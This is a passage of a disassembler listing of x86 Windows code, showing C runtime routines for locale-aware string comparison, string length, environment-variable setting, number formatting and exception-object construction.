push [ebp+lpString2]
call sub_422A89
pop ecx
pop ecx
mov [ebp+cchCount2], eax
loc_4228AB: ; CODE XREF: sub_42280C+8D�j
mov eax, dword ptr byte_445EDC+0D46CCh
cmp eax, 2
jnz short loc_4228D0
push [ebp+cchCount2] ; cchCount2
push [ebp+lpString2] ; lpString2
push esi ; cchCount1
push [ebp+lpMultiByteStr] ; lpString1
push [ebp+dwCmpFlags] ; dwCmpFlags
push [ebp+Locale] ; Locale
call CompareStringA ; CompareStringA
jmp loc_422A77
; ---------------------------------------------------------------------------
loc_4228D0: ; CODE XREF: sub_42280C+A7�j
cmp eax, edi
jnz loc_422A75
cmp [ebp+CodePage], ebx
jnz short loc_4228E5
mov eax, dword ptr byte_445EDC+0D4484h
mov [ebp+CodePage], eax
loc_4228E5: ; CODE XREF: sub_42280C+CF�j
cmp esi, ebx
jz short loc_4228F2
cmp [ebp+cchCount2], ebx
jnz loc_42298A
loc_4228F2: ; CODE XREF: sub_42280C+DB�j
cmp esi, [ebp+cchCount2]
jnz short loc_4228FF
loc_4228F7: ; CODE XREF: sub_42280C+13C�j
; sub_42280C+16D�j
push 2
loc_4228F9: ; CODE XREF: sub_42280C+146�j
pop eax
jmp loc_422A77
; ---------------------------------------------------------------------------
loc_4228FF: ; CODE XREF: sub_42280C+E9�j
cmp [ebp+cchCount2], edi
jle short loc_42290B
loc_422904: ; CODE XREF: sub_42280C+151�j
; sub_42280C+159�j ...
mov eax, edi
jmp loc_422A77
; ---------------------------------------------------------------------------
loc_42290B: ; CODE XREF: sub_42280C+F6�j
cmp esi, edi
jg short loc_422950
lea eax, [ebp+CPInfo]
push eax ; lpCPInfo
push [ebp+CodePage] ; CodePage
call GetCPInfo ; GetCPInfo
test eax, eax
jz loc_422A75
cmp esi, ebx
jle short loc_422954
cmp [ebp+CPInfo.MaxCharSize], 2
jb short loc_422950
lea eax, [ebp+CPInfo.LeadByte]
cmp [ebp+CPInfo.LeadByte], bl
jz short loc_422950
loc_422936: ; CODE XREF: sub_42280C+142�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_422950
mov ecx, [ebp+lpMultiByteStr]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_42294A
cmp cl, dl
jbe short loc_4228F7
loc_42294A: ; CODE XREF: sub_42280C+138�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_422936
loc_422950: ; CODE XREF: sub_42280C+101�j
; sub_42280C+120�j ...
push 3
jmp short loc_4228F9
; ---------------------------------------------------------------------------
loc_422954: ; CODE XREF: sub_42280C+11A�j
cmp [ebp+cchCount2], ebx
jle short loc_42298A
cmp [ebp+CPInfo.MaxCharSize], 2
jb short loc_422904
lea eax, [ebp+CPInfo.LeadByte]
cmp [ebp+CPInfo.LeadByte], bl
jz short loc_422904
loc_422967: ; CODE XREF: sub_42280C+177�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_422904
mov ecx, [ebp+lpString2]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_42297F
cmp cl, dl
jbe loc_4228F7
loc_42297F: ; CODE XREF: sub_42280C+169�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_422967
jmp loc_422904
; ---------------------------------------------------------------------------
loc_42298A: ; CODE XREF: sub_42280C+E0�j
; sub_42280C+14B�j
push ebx ; cchWideChar
push ebx ; lpWideCharStr
push esi ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
push 9 ; dwFlags
push [ebp+CodePage] ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
mov [ebp+cchCount1], eax
cmp eax, ebx
jz loc_422A75
mov [ebp+var_4], ebx
add eax, eax
add eax, 3
and al, 0FCh
call sub_417F30
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+lpString1], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4229D9
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
mov [ebp+lpString1], ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+cbMultiByte]
push 1
pop edi
loc_4229D9: ; CODE XREF: sub_42280C+1B5�j
cmp [ebp+lpString1], ebx
jz loc_422A75
push [ebp+cchCount1] ; cchWideChar
push [ebp+lpString1] ; lpWideCharStr
push esi ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
push edi ; dwFlags
push [ebp+CodePage] ; CodePage
mov esi, MultiByteToWideChar
call esi ; MultiByteToWideChar
test eax, eax
jz short loc_422A75
push ebx ; cchWideChar
push ebx ; lpWideCharStr
push [ebp+cchCount2] ; cbMultiByte
push [ebp+lpString2] ; lpMultiByteStr
push 9 ; dwFlags
push [ebp+CodePage] ; CodePage
call esi ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_20], esi
cmp esi, ebx
jz short loc_422A75
mov [ebp+var_4], edi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_417F30
mov [ebp+var_18], esp
mov edi, esp
mov [ebp+var_28], edi
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_422A44
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor edi, edi
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_20]
loc_422A44: ; CODE XREF: sub_42280C+224�j
cmp edi, ebx
jz short loc_422A75
push esi ; cchWideChar
push edi ; lpWideCharStr
push [ebp+cchCount2] ; cbMultiByte
push [ebp+lpString2] ; lpMultiByteStr
push 1 ; dwFlags
push [ebp+CodePage] ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
test eax, eax
jz short loc_422A75
push esi ; cchCount2
push edi ; lpString2
push [ebp+cchCount1] ; cchCount1
push [ebp+lpString1] ; lpString1
push [ebp+dwCmpFlags] ; dwCmpFlags
push [ebp+Locale] ; Locale
call CompareStringW ; CompareStringW
jmp short loc_422A77
; ---------------------------------------------------------------------------
loc_422A75: ; CODE XREF: sub_42280C+63�j
; sub_42280C+C6�j ...
xor eax, eax
loc_422A77: ; CODE XREF: sub_42280C+BF�j
; sub_42280C+EE�j ...
lea esp, [ebp-4Ch]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_42280C endp
; =============== S U B R O U T I N E =======================================
sub_422A89 proc near ; CODE XREF: sub_41EE0F+81�p
; sub_42280C+7E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_422AA6
loc_422A99: ; CODE XREF: sub_422A89+1B�j
cmp byte ptr [eax], 0
jz short loc_422AA6
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_422A99
loc_422AA6: ; CODE XREF: sub_422A89+E�j
; sub_422A89+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_422AB1
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_422AB1: ; CODE XREF: sub_422A89+21�j
mov eax, edx
retn
sub_422A89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_422AB4(LPCSTR lpMultiByteStr, int)
sub_422AB4 proc near ; CODE XREF: sub_42279E+50�p
var_8 = dword ptr -8
lpMem = dword ptr -4
lpMultiByteStr = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp [ebp+lpMultiByteStr], edi
jz short loc_422B18
push 3Dh
push [ebp+lpMultiByteStr]
call sub_422CFA
mov esi, eax
pop ecx
cmp esi, edi
pop ecx
mov [ebp+var_8], esi
jz short loc_422B18
cmp [ebp+lpMultiByteStr], esi
jz short loc_422B18
mov eax, dword ptr byte_445EDC+0D440Ch
xor ebx, ebx
cmp [esi+1], bl
setz bl
cmp eax, dword ptr byte_445EDC+0D4410h
jnz short loc_422AFE
push eax
call sub_422C93
pop ecx
mov dword ptr byte_445EDC+0D440Ch, eax
loc_422AFE: ; CODE XREF: sub_422AB4+3C�j
cmp eax, edi
jnz short loc_422B56
cmp [ebp+arg_4], edi
jz short loc_422B20
cmp dword ptr byte_445EDC+0D4414h, edi
jz short loc_422B20
call sub_42279E
test eax, eax
jz short loc_422B56
loc_422B18: ; CODE XREF: sub_422AB4+D�j
; sub_422AB4+22�j ...
or eax, 0FFFFFFFFh
loc_422B1B: ; CODE XREF: sub_422AB4+182�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_422B20: ; CODE XREF: sub_422AB4+51�j
; sub_422AB4+59�j
cmp ebx, edi
jnz loc_422C34
push 4
call sub_418175
cmp eax, edi
pop ecx
mov dword ptr byte_445EDC+0D440Ch, eax
jz short loc_422B18
mov [eax], edi
cmp dword ptr byte_445EDC+0D4414h, edi
jnz short loc_422B56
push 4
call sub_418175
cmp eax, edi
pop ecx
mov dword ptr byte_445EDC+0D4414h, eax
jz short loc_422B18
mov [eax], edi
loc_422B56: ; CODE XREF: sub_422AB4+4C�j
; sub_422AB4+62�j ...
sub esi, [ebp+lpMultiByteStr]
mov edi, dword ptr byte_445EDC+0D440Ch
mov [ebp+lpMem], edi
push esi ; cchCount2
push [ebp+lpMultiByteStr] ; lpMultiByteStr
call sub_422C3B
mov esi, eax
pop ecx
test esi, esi
pop ecx
jl short loc_422BB6
cmp dword ptr [edi], 0
jz short loc_422BB6
test ebx, ebx
jz short loc_422BAE
push dword ptr [edi+esi*4] ; lpMem
lea edi, [edi+esi*4]
call sub_418227
pop ecx
loc_422B88: ; CODE XREF: sub_422AB4+E2�j
cmp dword ptr [edi], 0
jz short loc_422B98
mov eax, [edi+4]
inc esi
mov [edi], eax
add edi, 4
jmp short loc_422B88
; ---------------------------------------------------------------------------
loc_422B98: ; CODE XREF: sub_422AB4+D7�j
mov eax, esi
shl eax, 2
push eax ; dwBytes
push [ebp+lpMem] ; lpMem
call sub_419C9F
pop ecx
test eax, eax
pop ecx
jz short loc_422BE8
jmp short loc_422BE3
; ---------------------------------------------------------------------------
loc_422BAE: ; CODE XREF: sub_422AB4+C6�j
mov eax, [ebp+lpMultiByteStr]
mov [edi+esi*4], eax
jmp short loc_422BE8
; ---------------------------------------------------------------------------
loc_422BB6: ; CODE XREF: sub_422AB4+BD�j
; sub_422AB4+C2�j
test ebx, ebx
jnz short loc_422C34
test esi, esi
jge short loc_422BC0
neg esi
loc_422BC0: ; CODE XREF: sub_422AB4+108�j
lea eax, ds:8[esi*4]
push eax ; dwBytes
push edi ; lpMem
call sub_419C9F
pop ecx
test eax, eax
pop ecx
jz loc_422B18
mov ecx, [ebp+lpMultiByteStr]
mov [eax+esi*4], ecx
and dword ptr [eax+esi*4+4], 0
loc_422BE3: ; CODE XREF: sub_422AB4+F8�j
mov dword ptr byte_445EDC+0D440Ch, eax
loc_422BE8: ; CODE XREF: sub_422AB4+F6�j
; sub_422AB4+100�j
cmp [ebp+arg_4], 0
jz short loc_422C34
push [ebp+lpMultiByteStr]
call sub_4180D0
inc eax
inc eax
push eax
call sub_418175
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_422C34
push [ebp+lpMultiByteStr]
push esi
call sub_417FE0
mov eax, esi
pop ecx
sub eax, [ebp+lpMultiByteStr]
pop ecx
add eax, [ebp+var_8]
and byte ptr [eax], 0
inc eax
neg ebx
sbb ebx, ebx
not ebx
and ebx, eax
push ebx ; lpValue
push esi ; lpName
call SetEnvironmentVariableA ; SetEnvironmentVariableA
push esi ; lpMem
call sub_418227
pop ecx
loc_422C34: ; CODE XREF: sub_422AB4+6E�j
; sub_422AB4+104�j ...
xor eax, eax
jmp loc_422B1B
sub_422AB4 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_422C3B(LPCSTR lpMultiByteStr, int cchCount2)
sub_422C3B proc near ; CODE XREF: sub_422AB4+B2�p
lpMultiByteStr = dword ptr 4
cchCount2 = dword ptr 8
push esi
mov esi, dword ptr byte_445EDC+0D440Ch
push edi
mov eax, [esi]
test eax, eax
jz short loc_422C76
mov edi, [esp+8+cchCount2]
loc_422C4D: ; CODE XREF: sub_422C3B+39�j
push edi ; cchCount2
push eax ; lpString2
push [esp+10h+lpMultiByteStr] ; lpMultiByteStr
call sub_42275F
add esp, 0Ch
test eax, eax
jnz short loc_422C6C
mov eax, [esi]
mov al, [eax+edi]
cmp al, 3Dh
jz short loc_422C86
test al, al
jz short loc_422C86
loc_422C6C: ; CODE XREF: sub_422C3B+22�j
mov eax, [esi+4]
add esi, 4
test eax, eax
jnz short loc_422C4D
loc_422C76: ; CODE XREF: sub_422C3B+C�j
mov eax, esi
sub eax, dword ptr byte_445EDC+0D440Ch
sar eax, 2
neg eax
loc_422C83: ; CODE XREF: sub_422C3B+56�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_422C86: ; CODE XREF: sub_422C3B+2B�j
; sub_422C3B+2F�j
mov eax, esi
sub eax, dword ptr byte_445EDC+0D440Ch
sar eax, 2
jmp short loc_422C83
sub_422C3B endp
; =============== S U B R O U T I N E =======================================
sub_422C93 proc near ; CODE XREF: sub_422AB4+3F�p
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor ecx, ecx
test edi, edi
jnz short loc_422CA2
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_422CA2: ; CODE XREF: sub_422C93+9�j
cmp dword ptr [edi], 0
lea eax, [edi+4]
jz short loc_422CB4
loc_422CAA: ; CODE XREF: sub_422C93+1F�j
mov edx, [eax]
inc ecx
add eax, 4
test edx, edx
jnz short loc_422CAA
loc_422CB4: ; CODE XREF: sub_422C93+15�j
push ebx
push ebp
lea eax, ds:4[ecx*4]
push esi
push eax
call sub_418175
mov esi, eax
pop ecx
test esi, esi
mov ebp, esi
jnz short loc_422CD5
push 9 ; NumberOfBytesWritten
call sub_41A45C
pop ecx
loc_422CD5: ; CODE XREF: sub_422C93+38�j
mov eax, [edi]
mov ebx, edi
loc_422CD9: ; CODE XREF: sub_422C93+5B�j
test eax, eax
jz short loc_422CF0
push eax
add ebx, 4
call sub_422D6D
mov [esi], eax
mov eax, [ebx]
pop ecx
add esi, 4
jmp short loc_422CD9
; ---------------------------------------------------------------------------
loc_422CF0: ; CODE XREF: sub_422C93+48�j
and dword ptr [esi], 0
mov eax, ebp
pop esi
pop ebp
pop ebx
pop edi
retn
sub_422C93 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422CFA proc near ; CODE XREF: sub_422AB4+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp dword ptr byte_445EDC+0D5700h, 0
jnz short loc_422D15
push [ebp+arg_4]
push [ebp+arg_0]
call sub_419690
pop ecx
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_422D15: ; CODE XREF: sub_422CFA+A�j
mov ecx, [ebp+arg_0]
loc_422D18: ; CODE XREF: sub_422CFA+56�j
movzx ax, byte ptr [ecx]
test ax, ax
jz short loc_422D5B
movzx edx, al
test byte ptr [edx+51B6E1h], 4
jz short loc_422D47
mov dl, [ecx+1]
inc ecx
test dl, dl
jz short loc_422D52
movzx eax, ax
movzx edx, dl
shl eax, 8
or eax, edx
cmp [ebp+arg_4], eax
jz short loc_422D56
jmp short loc_422D4F
; ---------------------------------------------------------------------------
loc_422D47: ; CODE XREF: sub_422CFA+31�j
movzx edx, ax
cmp [ebp+arg_4], edx
jz short loc_422D5B
loc_422D4F: ; CODE XREF: sub_422CFA+4B�j
inc ecx
jmp short loc_422D18
; ---------------------------------------------------------------------------
loc_422D52: ; CODE XREF: sub_422CFA+39�j
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_422D56: ; CODE XREF: sub_422CFA+49�j
lea eax, [ecx-1]
pop ebp
retn
; ---------------------------------------------------------------------------
loc_422D5B: ; CODE XREF: sub_422CFA+25�j
; sub_422CFA+53�j
movzx edx, ax
mov eax, [ebp+arg_4]
sub eax, edx
neg eax
sbb eax, eax
not eax
and eax, ecx
pop ebp
retn
sub_422CFA endp
; =============== S U B R O U T I N E =======================================
sub_422D6D proc near ; CODE XREF: sub_40B124+21�p
; sub_422C93+4E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_422D94
push esi
call sub_4180D0
inc eax
push eax
call sub_418175
pop ecx
test eax, eax
pop ecx
jz short loc_422D94
push esi
push eax
call sub_417FE0
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_422D94: ; CODE XREF: sub_422D6D+7�j
; sub_422D6D+1A�j
xor eax, eax
pop esi
retn
sub_422D6D endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_422DA0 proc near ; CODE XREF: sub_404FCB+12�p
; sub_405025+12�p ...
mov eax, offset loc_423874
call sub_41887C
sub esp, 30h
mov al, [ebp-0Dh]
push esi
push 0
lea ecx, [ebp-20h]
mov [ebp-20h], al
call sub_4051D0
mov esi, 424C98h
push esi
call sub_4180D0
pop ecx
push eax
push esi
lea ecx, [ebp-20h]
call sub_405208
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_422DFA
lea eax, [ebp-3Ch]
push 424FF8h
push eax
mov dword ptr [ebp-3Ch], 424C8Ch
call sub_423316
pop esi
sub_422DA0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_422DFA proc near ; CODE XREF: sub_422DA0+3F�p
; sub_422FCC+3F�p
mov eax, offset loc_423888
call sub_41887C
push ecx
push ecx
push ebx
push esi
lea eax, [ebp-10h]
push edi
mov esi, ecx
push eax
mov [ebp-14h], esi
mov dword ptr [ebp-10h], 440F9Ch
call sub_42323B
mov ebx, [ebp+8]
and dword ptr [ebp-4], 0
lea edi, [esi+0Ch]
push 0
mov al, [ebx]
mov ecx, edi
mov [edi], al
call sub_4051D0
push dword ptr unk_424CB8
mov ecx, edi
push 0
push ebx
call sub_40507D
mov ecx, [ebp-0Ch]
mov dword ptr [esi], 424CACh
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 4
sub_422DFA endp
; ---------------------------------------------------------------------------
mov eax, [ecx+10h]
test eax, eax
jnz short locret_422E6A
mov eax, offset unk_424280
locret_422E6A: ; CODE XREF: .text:00422E63�j
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp-1Ch]
call sub_422EE1
lea eax, [ebp-1Ch]
push 425068h
push eax
call sub_423316
; =============== S U B R O U T I N E =======================================
sub_422E88 proc near ; CODE XREF: .text:00422EC8�p
mov eax, offset loc_42389C
call sub_41887C
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
mov dword ptr [esi], 424CACh
and dword ptr [ebp-4], 0
push 1
lea ecx, [esi+0Ch]
call sub_4051D0
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, esi
call sub_4232C2
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_422E88 endp
; ---------------------------------------------------------------------------
push esi
mov esi, ecx
call sub_422E88
test byte ptr [esp+8], 1
jz short loc_422EDB
push esi
call sub_41889B
pop ecx
loc_422EDB: ; CODE XREF: .text:00422ED2�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_422EE1 proc near ; CODE XREF: .text:00422E75�p
; sub_422FB4+7�p ...
mov eax, offset loc_4238B0
call sub_41887C
push ecx
push ebx
mov ebx, [ebp+8]
push esi
push edi
mov esi, ecx
push ebx
mov [ebp-10h], esi
call sub_423278
mov al, [ebx+0Ch]
and dword ptr [ebp-4], 0
add ebx, 0Ch
lea edi, [esi+0Ch]
push 0
mov ecx, edi
mov [edi], al
call sub_4051D0
push dword ptr unk_424CB8
mov ecx, edi
push 0
push ebx
call sub_40507D
mov ecx, [ebp-0Ch]
mov dword ptr [esi], 424CACh
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 4
sub_422EE1 endp
; =============== S U B R O U T I N E =======================================
sub_422F3E proc near ; CODE XREF: .text:00422F9B�p
mov eax, offset loc_4238C4
call sub_41887C
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
mov dword ptr [esi], 424CACh
and dword ptr [ebp-4], 0
push 1
lea ecx, [esi+0Ch]
call sub_4051D0
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, esi
call sub_4232C2
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_422F3E endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp-1Ch]
call sub_422FB4
lea eax, [ebp-1Ch]
push 424FF8h
push eax
call sub_423316
push esi
mov esi, ecx
call sub_422F3E
test byte ptr [esp+8], 1
jz short loc_422FAE
push esi
call sub_41889B
pop ecx
loc_422FAE: ; CODE XREF: .text:00422FA5�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_422FB4 proc near ; CODE XREF: .text:00422F85�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_422EE1
mov dword ptr [esi], 424C8Ch
mov eax, esi
pop esi
retn 4
sub_422FB4 endp
; =============== S U B R O U T I N E =======================================
sub_422FCC proc near ; CODE XREF: sub_40507D+13�p
; sub_40523D+E�p
mov eax, offset loc_4238D8
call sub_41887C
sub esp, 30h
mov al, [ebp-0Dh]
push esi
push 0
lea ecx, [ebp-20h]
mov [ebp-20h], al
call sub_4051D0
mov esi, 424CCCh
push esi
call sub_4180D0
pop ecx
push eax
push esi
lea ecx, [ebp-20h]
call sub_405208
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_422DFA
lea eax, [ebp-3Ch]
push 425120h
push eax
mov dword ptr [ebp-3Ch], 424CC0h
call sub_423316
pop esi
sub_422FCC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_423026 proc near ; CODE XREF: .text:00423083�p
mov eax, offset loc_4238EC
call sub_41887C
push ecx
push esi
mov esi, ecx
mov [ebp-10h], esi
mov dword ptr [esi], 424CACh
and dword ptr [ebp-4], 0
push 1
lea ecx, [esi+0Ch]
call sub_4051D0
or dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, esi
call sub_4232C2
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_423026 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp-1Ch]
call sub_42309C
lea eax, [ebp-1Ch]
push 425120h
push eax
call sub_423316
push esi
mov esi, ecx
call sub_423026
test byte ptr [esp+8], 1
jz short loc_423096
push esi
call sub_41889B
pop ecx
loc_423096: ; CODE XREF: .text:0042308D�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_42309C proc near ; CODE XREF: .text:0042306D�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_422EE1
mov dword ptr [esi], 424CC0h
mov eax, esi
pop esi
retn 4
sub_42309C endp
; ---------------------------------------------------------------------------
test byte_445EDC+0D46D8h, 1
jnz short loc_4230C4
or byte_445EDC+0D46D8h, 1
loc_4230C4: ; CODE XREF: .text:004230BB�j
call sub_4230DE
test byte_445EDC+0D5A60h, 1
jnz short loc_4230D9
or byte_445EDC+0D5A60h, 1
loc_4230D9: ; CODE XREF: .text:004230D0�j
jmp loc_4230EA
; =============== S U B R O U T I N E =======================================
sub_4230DE proc near ; CODE XREF: .text:loc_4230C4�p
push offset nullsub_1
call sub_418C60
pop ecx
retn
sub_4230DE endp
; ---------------------------------------------------------------------------
loc_4230EA: ; CODE XREF: .text:loc_4230D9�j
push offset nullsub_1
call sub_418C60
pop ecx
retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION __WSAFDIsSet. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION VerQueryValueA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetFileVersionInfoA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetFileVersionInfoSizeA. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_423116 proc near ; CODE XREF: sub_409CEB+E2�p
; sub_409CEB+F9�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp dword ptr byte_445EDC+0D4474h, 0
push ebx
jnz short loc_42315C
mov edx, [esp+4+arg_4]
mov ecx, [esp+4+arg_0]
loc_423128: ; CODE XREF: sub_423116+42�j
mov bx, [ecx]
cmp bx, 5Ah
ja short loc_42313A
cmp bx, 41h
jb short loc_42313A
add ebx, 20h
loc_42313A: ; CODE XREF: sub_423116+19�j
; sub_423116+1F�j
mov ax, [edx]
cmp ax, 5Ah
ja short loc_42314C
cmp ax, 41h
jb short loc_42314C
add eax, 20h
loc_42314C: ; CODE XREF: sub_423116+2B�j
; sub_423116+31�j
inc ecx
inc ecx
inc edx
inc edx
test bx, bx
jz short loc_42318C
cmp bx, ax
jz short loc_423128
jmp short loc_42318C
; ---------------------------------------------------------------------------
loc_42315C: ; CODE XREF: sub_423116+8�j
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, [esp+0Ch+arg_4]
loc_423166: ; CODE XREF: sub_423116+72�j
mov ax, [esi]
inc esi
push eax ; WideCharStr
inc esi
call sub_423350
mov ebx, eax
mov ax, [edi]
inc edi
push eax ; WideCharStr
inc edi
call sub_423350
pop ecx
test bx, bx
pop ecx
jz short loc_42318A
cmp bx, ax
jz short loc_423166
loc_42318A: ; CODE XREF: sub_423116+6D�j
pop edi
pop esi
loc_42318C: ; CODE XREF: sub_423116+3D�j
; sub_423116+44�j
movzx ecx, ax
movzx eax, bx
sub eax, ecx
pop ebx
retn
sub_423116 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423196 proc near ; CODE XREF: .text:0041676F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0Ah
jnz short loc_4231AB
cmp [ebp+arg_0], 0
jge short loc_4231AB
push 1
push 0Ah
jmp short loc_4231B0
; ---------------------------------------------------------------------------
loc_4231AB: ; CODE XREF: sub_423196+7�j
; sub_423196+D�j
push 0
push [ebp+arg_8]
loc_4231B0: ; CODE XREF: sub_423196+13�j
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4231C3
mov eax, [ebp+arg_4]
add esp, 10h
pop ebp
retn
sub_423196 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4231C3 proc near ; CODE XREF: sub_423196+20�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_C], 0
mov ecx, [ebp+arg_4]
push ebx
push esi
push edi
jz short loc_4231DD
mov esi, [ebp+arg_0]
mov byte ptr [ecx], 2Dh
inc ecx
neg esi
jmp short loc_4231E0
; ---------------------------------------------------------------------------
loc_4231DD: ; CODE XREF: sub_4231C3+D�j
mov esi, [ebp+arg_0]
loc_4231E0: ; CODE XREF: sub_4231C3+18�j
mov edi, ecx
loc_4231E2: ; CODE XREF: sub_4231C3+43�j
mov eax, esi
xor edx, edx
div [ebp+arg_8]
mov eax, esi
mov ebx, edx
xor edx, edx
div [ebp+arg_8]
cmp ebx, 9
mov esi, eax
jbe short loc_4231FE
add bl, 57h
jmp short loc_423201
; ---------------------------------------------------------------------------
loc_4231FE: ; CODE XREF: sub_4231C3+34�j
add bl, 30h
loc_423201: ; CODE XREF: sub_4231C3+39�j
mov [ecx], bl
inc ecx
test esi, esi
ja short loc_4231E2
and byte ptr [ecx], 0
dec ecx
loc_42320C: ; CODE XREF: sub_4231C3+55�j
mov dl, [edi]
mov al, [ecx]
mov [ecx], dl
mov [edi], al
dec ecx
inc edi
cmp edi, ecx
jb short loc_42320C
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4231C3 endp
; ---------------------------------------------------------------------------
push esi
mov esi, ecx
call sub_4232C2
test byte ptr [esp+8], 1
jz short loc_423235
push esi
call sub_41889B
pop ecx
loc_423235: ; CODE XREF: .text:0042322C�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_42323B proc near ; CODE XREF: sub_422DFA+1F�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], 424CE8h
push dword ptr [edi]
call sub_4180D0
inc eax
push eax
call sub_418BE5
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_42326A
push dword ptr [edi]
push eax
call sub_417FE0
pop ecx
pop ecx
loc_42326A: ; CODE XREF: sub_42323B+23�j
mov dword ptr [esi+8], 1
mov eax, esi
pop edi
pop esi
retn 4
sub_42323B endp
; =============== S U B R O U T I N E =======================================
sub_423278 proc near ; CODE XREF: sub_422EE1+17�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], 424CE8h
mov eax, [edi+8]
test eax, eax
mov [esi+8], eax
jz short loc_4232B5
